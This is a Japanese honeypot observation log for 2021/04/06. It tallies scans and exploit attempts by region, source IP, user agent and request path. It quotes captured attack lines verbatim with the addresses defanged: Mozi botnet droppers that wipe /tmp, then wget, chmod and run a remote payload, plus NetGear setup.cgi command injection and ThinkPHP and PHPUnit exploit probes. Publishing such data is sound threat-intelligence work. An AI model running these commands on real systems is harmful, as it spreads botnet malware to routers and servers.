2021/04/06 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2021/04/06分です。

特徴

共通

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為

Location：JP

UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//178[.]175[.]17[.]75:45626/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

cd /tmp;
rm -rf *;
wget http[:]//27[.]41[.]5[.]128:60348/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location：US

Apache Tomcatへのスキャン行為
WordPressへのスキャン行為
110[.]242[.]68[.]4に関する不正通信
UserAgentがHello, Worldであるアクセス
を確認しました。

Location：UK

NetGear製品の脆弱性を狙うアクセス
/.envへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location：SG

NetGear製品の脆弱性を狙うアクセス
ZmEuによるスキャン行為
/.envへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
WordPressへのスキャン行為
110[.]242[.]68[.]4に関する不正通信
112[.]124[.]42[.]80に関する不正通信
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//58[.]253[.]8[.]32:56495/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

他

アクセス数推移

JP：総アクセス数：48 (前日比：-59)
US：総アクセス数：78 (前日比：+21)
UK：総アクセス数：33 (前日比：-132)
SG：総アクセス数：76 (前日比：+16)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	3.94.20.255	United States
1	3.237.0.246	United States
1	13.233.4.112	United States
3	23.98.154.25	United States
1	27.41.5.128	China
1	39.107.245.131	China
1	40.79.57.64	United States
1	45.80.153.160	Germany
11	45.155.205.151	Russia
1	45.229.54.248	Brazil
1	47.241.122.153	United States
1	54.172.81.86	United States
1	79.26.158.174	Italy
1	84.38.132.44	Belize
1	98.189.198.168	United States
1	117.201.205.161	India
1	118.239.23.35	China
1	139.28.38.209	Ukraine
1	143.198.56.16	United States
1	150.136.75.66	United States
1	157.245.143.43	United States
1	163.172.68.26	United Kingdom
1	178.175.17.75	Albania
1	182.121.205.92	China
1	185.100.87.136	Seychelles
7	193.169.255.95	Poland
3	205.185.122.102	United States
1	207.246.123.227	United States

UserAgent一覧

件数	UserAgent
6	-
1	Hello, World
2	Hello, world
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
1	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
7	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
11	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
2	python-requests/2.18.4

リクエスト内容一覧

件数	Method	Request	Protocol
1		\x16\x03\x01
12	GET	/.env	HTTP/1.1
1	GET	/.git	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
2	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/boaform/admin/formLogin?username=ec8&psd=ec8	HTTP/1.0
3	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/dump.sql	HTTP/1.1
1	GET	/etc/passwd	HTTP/1.1
1	GET	/index.php	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
2	GET	/myjsp.jsp	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//178[.]175[.]17[.]75:45626/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//27[.]41[.]5[.]128:60348/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	http[:]//passport[.]baidu[.]com/	HTTP/1.1
1	HEAD	/	HTTP/1.1
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/GponForm/diag_Form?images/	HTTP/1.1
2	POST	/HNAP1/	HTTP/1.0
1	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/index.htm	HTTP/1.1
2	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
4	PUT	/myjsp.jsp/	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	27.224.137.7	China
1	31.210.20.170	Netherlands
1	40.76.60.168	United States
22	45.155.205.151	Russia
1	58.97.201.45	Cambodia
1	60.13.138.58	China
1	60.208.208.218	China
1	61.52.72.45	China
1	61.52.83.198	China
1	89.248.174.173	United Kingdom
1	113.128.104.43	China
1	120.85.110.147	China
1	120.85.110.253	China
3	145.239.82.0	France
1	150.255.3.212	China
1	163.172.68.26	United Kingdom
7	167.99.215.170	United States
1	172.105.77.209	United States
1	175.184.164.194	China
1	178.175.93.115	Albania
2	178.238.8.230	United Kingdom
7	192.100.159.106	Mexico
7	201.116.250.2	Mexico
2	205.185.122.102	United States
3	207.7.120.154	United States
1	209.126.107.176	United States
7	218.104.225.148	China

UserAgent一覧

件数	UserAgent
6	-
1	Hello, World
1	Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
28	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
5	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
22	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2	Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36 OPR/54.0.2952.51
5	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1	Mozilla/5.01724933 Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E302
4	PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
1	User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705

リクエスト内容一覧

件数	Method	Request	Protocol
1		-
3		\x16\x03\x01
1	CONNECT	cn[.]bing[.]com/:443	HTTP/1.1
1	CONNECT	www[.]baidu[.]com/:443	HTTP/1.1
1	CONNECT	www[.]bing[.]com/:443	HTTP/1.1
1	CONNECT	www[.]so[.]com/:443	HTTP/1.1
1	CONNECT	www[.]voanews[.]com/:443	HTTP/1.1
6	GET	/.env	HTTP/1.1
2	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
2	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
4	GET	/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=__HelloThinkPHP	HTTP/1.1
2	GET	/_ignition/execute-solution	HTTP/1.1
2	GET	/config/getuser?index=0	HTTP/1.1
2	GET	/console/	HTTP/1.1
2	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
4	GET	/jenkins/login	HTTP/1.1
4	GET	/login	HTTP/1.1
5	GET	/manager/html	HTTP/1.1
2	GET	/solr/admin/info/system?wt=json	HTTP/1.1
2	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
2	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
4	GET	/wp-login.php	HTTP/1.1
1	GET	http[:]//dongtaiwang[.]com/	HTTP/1.1
1	GET	http[:]//www[.]bing[.]com/	HTTP/1.1
1	GET	http[:]//www[.]minghui[.]org/	HTTP/1.1
1	GET	http[:]//www[.]rfa[.]org/english/	HTTP/1.1
1	GET	http[:]//www[.]soso[.]com/	HTTP/1.1
1	GET	http[:]//www[.]wujieliulan[.]com/	HTTP/1.1
1	HEAD	http[:]//110[.]242[.]68[.]4/	HTTP/1.1
2	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/GponForm/diag_Form?images/	HTTP/1.1
1	POST	/HNAP1/	HTTP/1.0
4	POST	/_ignition/execute-solution	HTTP/1.1
2	POST	/api/jsonws/invoke	HTTP/1.1
6	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	http[:]//impius[.]fun/fa12f2b318e5a114804cac9882f5d1d278ebe8226aa27ff517d21b64304a103f7967141c67424fbd3afba93d6eecb5b8d6a854d718a5ab8cd7bcd7e7fe535a00a6670097075349307d3c4318c7713ba6c4eb7b525a9a7f6dc250654bcbe24b3a	HTTP/1.1

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
4	5.8.10.202	Russia
1	36.37.185.101	Cambodia
1	45.124.137.219	Japan
11	45.155.205.151	Russia
1	45.224.169.47	Brazil
1	103.217.123.252	India
4	104.224.29.59	United States
2	107.179.35.246	United States
1	112.237.141.241	China
1	120.85.99.100	China
1	176.107.177.161	Ukraine
1	182.112.30.19	China
1	185.202.2.65	Russia
1	197.136.174.162	Kenya
2	205.185.122.102	United States

UserAgent一覧

件数	UserAgent
8	-
1	Hello, World
1	Hello, world
2	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
7	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1	python-requests/2.18.4

リクエスト内容一覧

件数	Method	Request	Protocol
1		\x03
2		\x16\x03\x01
1		27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$	HTTP/1.0
4	GET	/.env	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/aaa9	HTTP/1.1
1	GET	/aab9	HTTP/1.1
1	GET	/app/.env	HTTP/1.1
2	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/core/.env	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/public/.env	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//45[.]224[.]169[.]47:49104/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	http[:]//m[.]baidu[.]com/?r=_1498538301212398101517164	HTTP/1.0
1	GET	http[:]//www[.]ceek[.]jp/?r=_860017139210108501118592	HTTP/1.0
1	HEAD	/	HTTP/1.1
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/GponForm/diag_Form?images/	HTTP/1.1
1	POST	/HNAP1/	HTTP/1.0
1	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	13.64.179.88	United States
1	36.5.68.40	China
1	36.5.223.160	China
1	36.32.3.182	China
11	45.155.205.151	Russia
1	49.113.99.40	China
1	52.163.87.223	United States
1	58.253.8.32	China
1	60.191.125.35	China
1	69.162.231.196	United States
2	89.248.165.24	United Kingdom
1	101.132.72.213	China
4	104.36.167.69	United States
3	111.7.96.156	China
1	119.118.7.72	China
1	119.118.17.139	China
1	120.85.111.57	China
6	121.173.126.140	South Korea
1	123.160.173.129	China
1	123.160.235.58	China
7	138.68.176.190	United States
1	139.28.38.209	Ukraine
1	161.97.114.213	Germany
1	163.172.68.26	United Kingdom
3	163.172.161.118	United Kingdom
1	171.36.97.6	China
1	171.36.132.120	China
1	178.175.32.69	Albania
1	178.238.8.230	United Kingdom
4	180.252.54.190	Indonesia
7	182.18.165.73	India
1	183.27.123.97	China
1	185.202.2.65	Russia
1	205.185.122.102	United States
2	209.141.61.146	United States
1	213.163.115.12	Albania

UserAgent一覧

件数	UserAgent
9	-
2	Chrome/54.0 (Windows NT 10.0)
1	Hello, World
1	Hello, world
6	Mozilla/5.0
15	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
6	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
12	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1	Mozilla/5.01712517 Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
1	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
4	PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
2	ZmEu
1	python-requests/2.18.4

リクエスト内容一覧

件数	Method	Request	Protocol
3		\x03
1		\x16\x03
1		\x16\x03\x01
1	CONNECT	cn[.]bing[.]com/:443	HTTP/1.1
1	CONNECT	m[.]blog[.]naver[.]com:443	HTTP/1.1
1	CONNECT	m[.]blog[.]naver[.]com:80	HTTP/1.1
1	CONNECT	www[.]baidu[.]com/:443	HTTP/1.1
1	CONNECT	www[.]bing[.]com/:443	HTTP/1.1
1	CONNECT	www[.]coupang[.]com/:443	HTTP/1.1
1	CONNECT	www[.]coupang[.]com/:80	HTTP/1.1
1	CONNECT	www[.]so[.]com/:443	HTTP/1.1
1	CONNECT	www[.]voanews[.]com/:443	HTTP/1.1
1	CONNECT	www[.]youtube[.]com/:443	HTTP/1.1
1	CONNECT	www[.]youtube[.]com/:80	HTTP/1.1
7	GET	/.env	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
3	GET	/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=__HelloThinkPHP	HTTP/1.1
1	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/app/.env	HTTP/1.1
1	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/core/.env	HTTP/1.1
1	GET	/favicon.ico	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
2	GET	/jenkins/login	HTTP/1.1
2	GET	/login	HTTP/1.1
2	GET	/manager/html	HTTP/1.1
1	GET	/phpMyAdmin/scripts/setup.php	HTTP/1.1
2	GET	/public/.env	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//178[.]175[.]32[.]69:46282/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//58[.]253[.]8[.]32:56495/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/storage/.env	HTTP/1.1
1	GET	/vendor/.env	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/w00tw00t.at.blackhats.romanian.anti-sec:)	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
2	GET	/wp-login.php	HTTP/1.1
1	GET	http[:]//dongtaiwang[.]com/	HTTP/1.1
1	GET	http[:]//www[.]bing[.]com/	HTTP/1.1
1	GET	http[:]//www[.]epochtimes[.]com/	HTTP/1.1
1	GET	http[:]//www[.]minghui[.]org/	HTTP/1.1
1	GET	http[:]//www[.]rfa[.]org/english/	HTTP/1.1
1	GET	http[:]//www[.]soso[.]com/	HTTP/1.1
1	GET	http[:]//www[.]wujieliulan[.]com/	HTTP/1.1
3	HEAD	/	HTTP/1.1
1	HEAD	http[:]//110[.]242[.]68[.]4/	HTTP/1.1
1	HEAD	http[:]//112[.]124[.]42[.]80:63435/	HTTP/1.1
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/GponForm/diag_Form?images/	HTTP/1.1
1	POST	/HNAP1/	HTTP/1.0
2	POST	/_ignition/execute-solution	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
3	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	http[:]//grzej[.]xyz/ff0261a6604249c93b4788e49f1effe2910de02a11ad21e153549795550db795a7c1ced398cead867cc08af6078a6683b1b729b7c5c1b8f0bdd8e74afeb1624d77a027f31c10b49eb19425c70e94c7e6c5e53991ffccf54c10cd151b03cd6916	HTTP/1.1